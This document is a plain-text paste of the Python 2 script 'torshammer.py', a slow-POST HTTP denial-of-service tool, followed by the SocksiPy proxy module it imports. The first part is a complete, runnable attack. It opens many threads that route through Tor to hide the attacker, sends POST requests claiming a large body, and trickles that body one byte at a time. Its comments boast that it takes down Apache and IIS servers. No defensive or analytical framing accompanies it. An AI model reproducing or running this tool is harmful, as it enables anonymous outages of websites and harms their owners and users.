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- #!/usr/bin/python
- # this assumes you have the socks.py (http://phiral.net/socks.py)
- # in the same directory and that you have tor running locally
- # on port 9050. run with 128 to 256 threads to be effective.
- # kills apache 1.X with ~128, apache 2.X / IIS with ~256.
- import os
- import re
- import time
- import sys
- import random
- import getopt
- import socks
- from threading import Thread
- from string import letters
- class httpPost(Thread):
- def __init__(self, host):
- Thread.__init__(self)
- self.host = host
- self.port = 80
- self.socks = socks.socksocket()
- self.running = True
- def _send_http_post(self, pause=10):
- self.socks.send("POST / HTTP/1.1\r\n"
- "Host: %s\r\n"
- "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
- "Connection: keep-alive\r\n"
- "Keep-Alive: 900\r\n"
- "Content-Length: 10000\r\n"
- "Content-Type: application/x-www-form-urlencoded\r\n\r\n" % (self.host))
- for i in range(0, 9999):
- print "!",
- self.socks.send('E')
- time.sleep(random.randrange(1, 3))
- self.socks.close()
- def run(self):
- while self.running:
- while self.running:
- try:
- self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
- self.socks.connect((self.host, self.port))
- print "c",
- break
- except Exception, e:
- if e.args[0] == 106 or e.args[0] == 60:
- break
- print "Couldn't connect:", e.args, self.host, self.port
- time.sleep(1)
- continue
- break
- while self.running:
- try:
- self._send_http_post()
- except Exception, e:
- if e.args[0] == 32 or e.args[0] == 104:
- print "thread connection broken, retrying."
- self.socks = socks.socksocket()
- break
- print "Couldn't send message on thread because", e.args
- time.sleep(0.1)
- pass
- def usage():
- print "./torshammer.py -t <target> -r <threads> [-h]",
- def main(argv):
- try:
- opts, args = getopt.getopt(argv, "ht:r:", ["help", "target=","threads="])
- except getopt.GetoptError:
- usage()
- sys.exit(-1)
- target = ''
- threads = 0
- for o, a in opts:
- if o in ("-h", "--help"):
- usage()
- sys.exit(0)
- elif o in ("-t", "--target"):
- target = a
- elif o in ("-r", "--threads"):
- threads = a
- if target == '' or int(threads) <= 0:
- usage()
- sys.exit(-1)
- print "\nTarget is: %s" % target
- print "Running with %d threads.\n" % int(threads)
- rthreads = []
- sys.stdout.write("!")
- for i in range(0, int(threads)):
- t = httpPost(target)
- rthreads.append(t)
- t.start()
- for fthread in rthreads:
- fthread.join()
- if __name__ == "__main__":
- # try:
- # pid = os.fork()
- # if pid > 0:
- # sys.exit(0)
- # except OSError, e:
- # print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
- # sys.exit(1)
- #
- # os.chdir('/')
- # os.setsid()
- # os.umask(0)
- #
- # try:
- # pid = os.fork()
- # if pid > 0:
- # sys.exit(0)
- # except OSError, e:
- # print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
- # sys.exit(1)
- main(sys.argv[1:])
- SOCKS.PY:
- ---------
- """SocksiPy - Python SOCKS module.
- Version 1.00
- Copyright 2006 Dan-Haim. All rights reserved.
- Redistribution and use in source and binary forms, with or without modification,
- are permitted provided that the following conditions are met:
- 1. Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- 2. Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
- 3. Neither the name of Dan Haim nor the names of his contributors may be used
- to endorse or promote products derived from this software without specific
- prior written permission.
- THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
- WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
- MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
- EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
- INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
- LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
- OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
- OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.
- This module provides a standard socket-like interface for Python
- for tunneling connections through SOCKS proxies.
- """
- import socket
- import struct
- PROXY_TYPE_SOCKS4 = 1
- PROXY_TYPE_SOCKS5 = 2
- PROXY_TYPE_HTTP = 3
- _defaultproxy = None
- _orgsocket = socket.socket
- class ProxyError(Exception):
- def __init__(self, value):
- self.value = value
- def __str__(self):
- return repr(self.value)
- class GeneralProxyError(ProxyError):
- def __init__(self, value):
- self.value = value
- def __str__(self):
- return repr(self.value)
- class Socks5AuthError(ProxyError):
- def __init__(self, value):
- self.value = value
- def __str__(self):
- return repr(self.value)
- class Socks5Error(ProxyError):
- def __init__(self, value):
- self.value = value
- def __str__(self):
- return repr(self.value)
- class Socks4Error(ProxyError):
- def __init__(self, value):
- self.value = value
- def __str__(self):
- return repr(self.value)
- class HTTPError(ProxyError):
- def __init__(self, value):
- self.value = value
- def __str__(self):
- return repr(self.value)
- _generalerrors = ("success",
- "invalid data",
- "not connected",
- "not available",
- "bad proxy type",
- "bad input")
- _socks5errors = ("succeeded",
- "general SOCKS server failure",
- "connection not allowed by ruleset",
- "Network unreachable",
- "Host unreachable",
- "Connection refused",
- "TTL expired",
- "Command not supported",
- "Address type not supported",
- "Unknown error")
- _socks5autherrors = ("succeeded",
- "authentication is required",
- "all offered authentication methods were rejected",
- "unknown username or invalid password",
- "unknown error")
- _socks4errors = ("request granted",
- "request rejected or failed",
- "request rejected because SOCKS server cannot connect to identd on the client",
- "request rejected because the client program and identd report different user-ids",
- "unknown error")
- def setdefaultproxy(proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
- """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
- Sets a default proxy which all further socksocket objects will use,
- unless explicitly changed.
- """
- global _defaultproxy
- _defaultproxy = (proxytype,addr,port,rdns,username,password)
- class socksocket(socket.socket):
- """socksocket([family[, type[, proto]]]) -> socket object
- Open a SOCKS enabled socket. The parameters are the same as
- those of the standard socket init. In order for SOCKS to work,
- you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
- """
- def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
- _orgsocket.__init__(self,family,type,proto,_sock)
- if _defaultproxy != None:
- self.__proxy = _defaultproxy
- else:
- self.__proxy = (None, None, None, None, None, None)
- self.__proxysockname = None
- self.__proxypeername = None
- def __recvall(self, bytes):
- """__recvall(bytes) -> data
- Receive EXACTLY the number of bytes requested from the socket.
- Blocks until the required number of bytes have been received.
- """
- data = ""
- while len(data) < bytes:
- data = data + self.recv(bytes-len(data))
- return data
- def setproxy(self,proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
- """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
- Sets the proxy to be used.
- proxytype - The type of the proxy to be used. Three types
- are supported: PROXY_TYPE_SOCKS4 (including socks4a),
- PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
- addr - The address of the server (IP or DNS).
- port - The port of the server. Defaults to 1080 for SOCKS
- servers and 8080 for HTTP proxy servers.
- rdns - Should DNS queries be preformed on the remote side
- (rather than the local side). The default is True.
- Note: This has no effect with SOCKS4 servers.
- username - Username to authenticate with to the server.
- The default is no authentication.
- password - Password to authenticate with to the server.
- Only relevant when username is also provided.
- """
- self.__proxy = (proxytype,addr,port,rdns,username,password)
- def __negotiatesocks5(self,destaddr,destport):
- """__negotiatesocks5(self,destaddr,destport)
- Negotiates a connection through a SOCKS5 server.
- """
- # First we'll send the authentication packages we support.
- if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
- # The username/password details were supplied to the
- # setproxy method so we support the USERNAME/PASSWORD
- # authentication (in addition to the standard none).
- self.sendall("\x05\x02\x00\x02")
- else:
- # No username/password were entered, therefore we
- # only support connections with no authentication.
- self.sendall("\x05\x01\x00")
- # We'll receive the server's response to determine which
- # method was selected
- chosenauth = self.__recvall(2)
- if chosenauth[0] != "\x05":
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- # Check the chosen authentication method
- if chosenauth[1] == "\x00":
- # No authentication is required
- pass
- elif chosenauth[1] == "\x02":
- # Okay, we need to perform a basic username/password
- # authentication.
- self.sendall("\x01" + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.proxy[5])) + self.__proxy[5])
- authstat = self.__recvall(2)
- if authstat[0] != "\x01":
- # Bad response
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- if authstat[1] != "\x00":
- # Authentication failed
- self.close()
- raise Socks5AuthError,((3,_socks5autherrors[3]))
- # Authentication succeeded
- else:
- # Reaching here is always bad
- self.close()
- if chosenauth[1] == "\xFF":
- raise Socks5AuthError((2,_socks5autherrors[2]))
- else:
- raise GeneralProxyError((1,_generalerrors[1]))
- # Now we can request the actual connection
- req = "\x05\x01\x00"
- # If the given destination address is an IP address, we'll
- # use the IPv4 address request even if remote resolving was specified.
- try:
- ipaddr = socket.inet_aton(destaddr)
- req = req + "\x01" + ipaddr
- except socket.error:
- # Well it's not an IP number, so it's probably a DNS name.
- if self.__proxy[3]==True:
- # Resolve remotely
- ipaddr = None
- req = req + "\x03" + chr(len(destaddr)) + destaddr
- else:
- # Resolve locally
- ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
- req = req + "\x01" + ipaddr
- req = req + struct.pack(">H",destport)
- self.sendall(req)
- # Get the response
- resp = self.__recvall(4)
- if resp[0] != "\x05":
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- elif resp[1] != "\x00":
- # Connection failed
- self.close()
- if ord(resp[1])<=8:
- raise Socks5Error(ord(resp[1]),_generalerrors[ord(resp[1])])
- else:
- raise Socks5Error(9,_generalerrors[9])
- # Get the bound address/port
- elif resp[3] == "\x01":
- boundaddr = self.__recvall(4)
- elif resp[3] == "\x03":
- resp = resp + self.recv(1)
- boundaddr = self.__recvall(resp[4])
- else:
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- boundport = struct.unpack(">H",self.__recvall(2))[0]
- self.__proxysockname = (boundaddr,boundport)
- if ipaddr != None:
- self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
- else:
- self.__proxypeername = (destaddr,destport)
- def getproxysockname(self):
- """getsockname() -> address info
- Returns the bound IP address and port number at the proxy.
- """
- return self.__proxysockname
- def getproxypeername(self):
- """getproxypeername() -> address info
- Returns the IP and port number of the proxy.
- """
- return _orgsocket.getpeername(self)
- def getpeername(self):
- """getpeername() -> address info
- Returns the IP address and port number of the destination
- machine (note: getproxypeername returns the proxy)
- """
- return self.__proxypeername
- def __negotiatesocks4(self,destaddr,destport):
- """__negotiatesocks4(self,destaddr,destport)
- Negotiates a connection through a SOCKS4 server.
- """
- # Check if the destination address provided is an IP address
- rmtrslv = False
- try:
- ipaddr = socket.inet_aton(destaddr)
- except socket.error:
- # It's a DNS name. Check where it should be resolved.
- if self.__proxy[3]==True:
- ipaddr = "\x00\x00\x00\x01"
- rmtrslv = True
- else:
- ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
- # Construct the request packet
- req = "\x04\x01" + struct.pack(">H",destport) + ipaddr
- # The username parameter is considered userid for SOCKS4
- if self.__proxy[4] != None:
- req = req + self.__proxy[4]
- req = req + "\x00"
- # DNS name if remote resolving is required
- # NOTE: This is actually an extension to the SOCKS4 protocol
- # called SOCKS4A and may not be supported in all cases.
- if rmtrslv==True:
- req = req + destaddr + "\x00"
- self.sendall(req)
- # Get the response from the server
- resp = self.__recvall(8)
- if resp[0] != "\x00":
- # Bad data
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- if resp[1] != "\x5A":
- # Server returned an error
- self.close()
- if ord(resp[1]) in (91,92,93):
- self.close()
- raise Socks4Error((ord(resp[1]),_socks4errors[ord(resp[1])-90]))
- else:
- raise Socks4Error((94,_socks4errors[4]))
- # Get the bound address/port
- self.__proxysockname = (socket.inet_ntoa(resp[4:]),struct.unpack(">H",resp[2:4])[0])
- if rmtrslv != None:
- self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
- else:
- self.__proxypeername = (destaddr,destport)
- def __negotiatehttp(self,destaddr,destport):
- """__negotiatehttp(self,destaddr,destport)
- Negotiates a connection through an HTTP server.
- """
- # If we need to resolve locally, we do this now
- if self.__proxy[3] == False:
- addr = socket.gethostbyname(destaddr)
- else:
- addr = destaddr
- self.sendall("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n")
- # We read the response until we get the string "\r\n\r\n"
- resp = self.recv(1)
- while resp.find("\r\n\r\n")==-1:
- resp = resp + self.recv(1)
- # We just need the first line to check if the connection
- # was successful
- statusline = resp.splitlines()[0].split(" ",2)
- if statusline[0] not in ("HTTP/1.0","HTTP/1.1"):
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- try:
- statuscode = int(statusline[1])
- except ValueError:
- self.close()
- raise GeneralProxyError((1,_generalerrors[1]))
- if statuscode != 200:
- self.close()
- raise HTTPError((statuscode,statusline[2]))
- self.__proxysockname = ("0.0.0.0",0)
- self.__proxypeername = (addr,destport)
- def connect(self,destpair):
- """connect(self,despair)
- Connects to the specified destination through a proxy.
- destpar - A tuple of the IP/DNS address and the port number.
- (identical to socket's connect).
- To select the proxy server use setproxy().
- """
- # Do a minimal input check first
- if (type(destpair) in (list,tuple)==False) or (len(destpair)<2) or (type(destpair[0])!=str) or (type(destpair[1])!=int):
- raise GeneralProxyError((5,_generalerrors[5]))
- if self.__proxy[0] == PROXY_TYPE_SOCKS5:
- if self.__proxy[2] != None:
- portnum = self.__proxy[2]
- else:
- portnum = 1080
- _orgsocket.connect(self,(self.__proxy[1],portnum))
- self.__negotiatesocks5(destpair[0],destpair[1])
- elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
- if self.__proxy[2] != None:
- portnum = self.__proxy[2]
- else:
- portnum = 1080
- _orgsocket.connect(self,(self.__proxy[1],portnum))
- self.__negotiatesocks4(destpair[0],destpair[1])
- elif self.__proxy[0] == PROXY_TYPE_HTTP:
- if self.__proxy[2] != None:
- portnum = self.__proxy[2]
- else:
- portnum = 8080
- _orgsocket.connect(self,(self.__proxy[1],portnum))
- self.__negotiatehttp(destpair[0],destpair[1])
- elif self.__proxy[0] == None:
- _orgsocket.connect(self,(destpair[0],destpair[1]))
- else:
- raise GeneralProxyError((4,_generalerrors[4]))
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